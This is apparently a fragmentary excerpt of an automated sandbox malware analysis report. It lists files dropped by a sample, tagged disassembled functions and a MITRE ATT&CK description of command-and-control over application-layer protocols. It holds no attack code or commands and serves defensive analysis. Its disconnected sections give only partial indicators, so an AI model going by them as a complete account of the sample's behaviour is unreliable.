C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A4.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2EE.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER30E.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rar

C:\Users\user\AppData\Local\Temp\0BAC4DC5.exe

C:\Users\user\AppData\Local\Temp\WIJSmB.exe

C:\Users\user\Desktop\desktop.ini

C:\Users\user\Desktop\update.exe

C:\Users\user\Documents\19CAD721B59B09B208B5A7E2F6387843.ico

C:\Windows\appcompat\Programs\Amcache.hve

Windows Analysis Report
5vrRrFN56j.exe

Function 009A9044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Function 004A29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Function 004A1099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Function 004A1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Function 004A6076 Relevance: 11.1, APIs: 7, Instructions: 616
memoryCOMMON

Function 004A2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Function 004A1E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Function 004A1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Function 004A28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Function 004A1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Function 004A1000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre